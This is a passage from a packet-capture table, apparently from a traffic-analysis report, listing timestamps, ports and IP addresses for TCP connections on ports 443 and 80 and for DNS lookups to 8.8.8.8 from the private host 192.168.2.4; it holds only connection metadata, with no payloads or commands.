May 11, 2021 14:33:15.877151966 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.877171993 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.877218962 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.878429890 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.878447056 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.878462076 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.878480911 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.878520012 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.878576994 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.878844976 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.878865957 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.878882885 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.878909111 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.878976107 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.881856918 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.881875992 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.881891012 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.881972075 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.905112982 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.905158043 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.905184031 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.905198097 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.905225992 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.905499935 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.905530930 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.905555010 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.905577898 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.906714916 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.906750917 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.906774044 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.906815052 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.906841993 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.907202005 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.907229900 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.907249928 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.907306910 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.908875942 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.908914089 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.908965111 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.908978939 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.909038067 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.909238100 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.909264088 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.909284115 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.909303904 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.909307003 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.909348011 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.913048983 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.913075924 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.913096905 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.913149118 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.913410902 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.913433075 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.913445950 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.913477898 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.913513899 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.914335966 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.914361000 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.914388895 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.914438963 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.915131092 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.915159941 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.915183067 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.915184975 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.915227890 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.916008949 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.916029930 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.916049957 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.916079044 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.916912079 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.916944027 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.916965961 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.916969061 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.917010069 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.917850018 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.917876005 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.917896032 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.917920113 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.918654919 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.918678999 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.918695927 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.918734074 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.918791056 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.919519901 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.919543982 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.919562101 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.919634104 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.920401096 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.920428038 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.920445919 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.920470953 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.920517921 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.921284914 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.921327114 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.921346903 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.921411991 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.922167063 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.922192097 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.922208071 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.922236919 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.922267914 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.923022985 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.923053980 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.923077106 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.923137903 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.923934937 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.923958063 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.923973083 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.924002886 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.924051046 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.924824953 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.924851894 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.924870014 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.924937963 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.925713062 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.925738096 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.925760031 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.925781965 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.925803900 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.926611900 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.926635981 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.926651955 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.926716089 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.927414894 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.927447081 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.927463055 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.927484035 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.927521944 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.928327084 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.928350925 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.928369045 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.928438902 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.929192066 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.929214954 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.929230928 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.929300070 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.929308891 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.930100918 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.930124044 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.930140018 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.930205107 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.930934906 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.930958986 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.930974007 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.931001902 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.931042910 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.931788921 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.931811094 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.931830883 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.931901932 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.932693958 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.932714939 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.932730913 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.932764053 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.932810068 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.933552980 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.933574915 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.933590889 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.933661938 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.934464931 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.934484959 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.934504032 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.934545040 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.934588909 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.935312033 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.935337067 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.935353041 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.935416937 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.946576118 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.946605921 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.946671009 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.948846102 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.948878050 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.948978901 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.953772068 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.953809023 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.953870058 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.958653927 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.958679914 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.958753109 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.963541031 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.963565111 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.963625908 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.968414068 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.968437910 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.968477964 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.972966909 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.972994089 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.973054886 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.974359989 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.974383116 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.974436998 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.975581884 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.975608110 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.975656986 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.976828098 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.976850033 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.976891041 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.977987051 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.978013992 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.978059053 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.979124069 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.979146957 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.979190111 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.980253935 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.980279922 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.980323076 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.981360912 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.981394053 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.981426954 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.982481003 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.982502937 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.982547045 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.983664036 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.983688116 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.983753920 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.984731913 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.984751940 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.984802008 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.985814095 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.985840082 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.985867023 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.986965895 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.986988068 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.987034082 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.988056898 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.988081932 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.988126040 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.989202976 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.989226103 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.989273071 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.990278006 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.990298033 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.990354061 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.991413116 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.991436005 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.991486073 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.992248058 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.992269993 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.992316961 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.993110895 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.993134022 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.993191004 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.994005919 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.994028091 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.994083881 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.994849920 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.994874001 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.994918108 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.995731115 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.995753050 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.995799065 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.996575117 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.996603966 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.996644020 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.997452021 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.997474909 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.997524977 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.998310089 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.998331070 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.998380899 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:15.999159098 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.999178886 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:15.999236107 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:16.000022888 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:16.000042915 CEST	443	49736	162.159.135.233	192.168.2.4
May 11, 2021 14:33:16.000083923 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:16.189325094 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:16.548507929 CEST	49737	80	192.168.2.4	162.159.135.233
May 11, 2021 14:33:16.548846006 CEST	49736	443	192.168.2.4	162.159.135.233
May 11, 2021 14:33:20.327800989 CEST	49743	80	192.168.2.4	162.88.193.70
May 11, 2021 14:33:20.465079069 CEST	80	49743	162.88.193.70	192.168.2.4
May 11, 2021 14:33:20.465195894 CEST	49743	80	192.168.2.4	162.88.193.70
May 11, 2021 14:33:20.465671062 CEST	49743	80	192.168.2.4	162.88.193.70
May 11, 2021 14:33:20.600436926 CEST	80	49743	162.88.193.70	192.168.2.4
May 11, 2021 14:33:20.600750923 CEST	80	49743	162.88.193.70	192.168.2.4
May 11, 2021 14:33:20.600816011 CEST	80	49743	162.88.193.70	192.168.2.4
May 11, 2021 14:33:20.600898027 CEST	49743	80	192.168.2.4	162.88.193.70
May 11, 2021 14:33:20.601577997 CEST	49743	80	192.168.2.4	162.88.193.70
May 11, 2021 14:33:20.737108946 CEST	80	49743	162.88.193.70	192.168.2.4
May 11, 2021 14:33:20.769959927 CEST	49744	80	192.168.2.4	162.88.193.70
May 11, 2021 14:33:20.905025005 CEST	80	49744	162.88.193.70	192.168.2.4
May 11, 2021 14:33:20.905121088 CEST	49744	80	192.168.2.4	162.88.193.70
May 11, 2021 14:33:20.905541897 CEST	49744	80	192.168.2.4	162.88.193.70
May 11, 2021 14:33:21.039788961 CEST	80	49744	162.88.193.70	192.168.2.4
May 11, 2021 14:33:21.040005922 CEST	80	49744	162.88.193.70	192.168.2.4
May 11, 2021 14:33:21.040020943 CEST	80	49744	162.88.193.70	192.168.2.4
May 11, 2021 14:33:21.040079117 CEST	49744	80	192.168.2.4	162.88.193.70
May 11, 2021 14:33:21.040493965 CEST	49744	80	192.168.2.4	162.88.193.70
May 11, 2021 14:33:21.174458027 CEST	80	49744	162.88.193.70	192.168.2.4
May 11, 2021 14:33:22.920932055 CEST	49746	443	192.168.2.4	172.67.188.154
May 11, 2021 14:33:22.962025881 CEST	443	49746	172.67.188.154	192.168.2.4
May 11, 2021 14:33:22.962248087 CEST	49746	443	192.168.2.4	172.67.188.154
May 11, 2021 14:33:23.055237055 CEST	49746	443	192.168.2.4	172.67.188.154
May 11, 2021 14:33:23.096321106 CEST	443	49746	172.67.188.154	192.168.2.4
May 11, 2021 14:33:23.097217083 CEST	443	49746	172.67.188.154	192.168.2.4
May 11, 2021 14:33:23.097259045 CEST	443	49746	172.67.188.154	192.168.2.4
May 11, 2021 14:33:23.097381115 CEST	49746	443	192.168.2.4	172.67.188.154
May 11, 2021 14:33:23.103365898 CEST	49746	443	192.168.2.4	172.67.188.154
May 11, 2021 14:33:23.144304037 CEST	443	49746	172.67.188.154	192.168.2.4
May 11, 2021 14:33:23.146349907 CEST	443	49746	172.67.188.154	192.168.2.4
May 11, 2021 14:33:23.189872026 CEST	49746	443	192.168.2.4	172.67.188.154
May 11, 2021 14:33:23.452481985 CEST	49746	443	192.168.2.4	172.67.188.154
May 11, 2021 14:33:23.493421078 CEST	443	49746	172.67.188.154	192.168.2.4
May 11, 2021 14:33:23.509557009 CEST	443	49746	172.67.188.154	192.168.2.4
May 11, 2021 14:33:23.689985991 CEST	49746	443	192.168.2.4	172.67.188.154
May 11, 2021 14:35:03.640010118 CEST	49746	443	192.168.2.4	172.67.188.154
May 11, 2021 14:35:03.682626963 CEST	443	49746	172.67.188.154	192.168.2.4
May 11, 2021 14:35:03.682754993 CEST	49746	443	192.168.2.4	172.67.188.154

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 11, 2021 14:33:07.222007990 CEST	49714	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:07.258749008 CEST	58028	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:07.271971941 CEST	53	49714	8.8.8.8	192.168.2.4
May 11, 2021 14:33:07.316636086 CEST	53	58028	8.8.8.8	192.168.2.4
May 11, 2021 14:33:08.017663956 CEST	53097	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:08.066581011 CEST	53	53097	8.8.8.8	192.168.2.4
May 11, 2021 14:33:08.159234047 CEST	49257	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:08.222162008 CEST	53	49257	8.8.8.8	192.168.2.4
May 11, 2021 14:33:08.902318001 CEST	62389	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:08.953906059 CEST	53	62389	8.8.8.8	192.168.2.4
May 11, 2021 14:33:09.791049004 CEST	49910	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:09.850828886 CEST	53	49910	8.8.8.8	192.168.2.4
May 11, 2021 14:33:10.571755886 CEST	55854	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:10.632040977 CEST	53	55854	8.8.8.8	192.168.2.4
May 11, 2021 14:33:11.604221106 CEST	64549	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:11.656853914 CEST	53	64549	8.8.8.8	192.168.2.4
May 11, 2021 14:33:12.609111071 CEST	63153	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:12.659666061 CEST	53	63153	8.8.8.8	192.168.2.4
May 11, 2021 14:33:13.619451046 CEST	52991	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:13.670387030 CEST	53	52991	8.8.8.8	192.168.2.4
May 11, 2021 14:33:14.862346888 CEST	53700	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:14.911451101 CEST	53	53700	8.8.8.8	192.168.2.4
May 11, 2021 14:33:15.028887987 CEST	51726	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:15.090392113 CEST	53	51726	8.8.8.8	192.168.2.4
May 11, 2021 14:33:15.546327114 CEST	56794	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:15.603993893 CEST	53	56794	8.8.8.8	192.168.2.4
May 11, 2021 14:33:15.814124107 CEST	56534	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:15.865660906 CEST	53	56534	8.8.8.8	192.168.2.4
May 11, 2021 14:33:16.638318062 CEST	56627	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:16.686970949 CEST	53	56627	8.8.8.8	192.168.2.4
May 11, 2021 14:33:17.796403885 CEST	56621	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:17.847006083 CEST	53	56621	8.8.8.8	192.168.2.4
May 11, 2021 14:33:18.762923002 CEST	63116	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:18.814749002 CEST	53	63116	8.8.8.8	192.168.2.4
May 11, 2021 14:33:19.686111927 CEST	64078	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:19.745333910 CEST	53	64078	8.8.8.8	192.168.2.4
May 11, 2021 14:33:20.132951975 CEST	64801	53	192.168.2.4	8.8.8.8
May 11, 2021 14:33:20.184025049 CEST	53	64801	8.8.8.8	192.168.2.4
May 11, 2021 14:33:20.201937914 CEST	61721	53	192.168.2.4	8.8.8.8
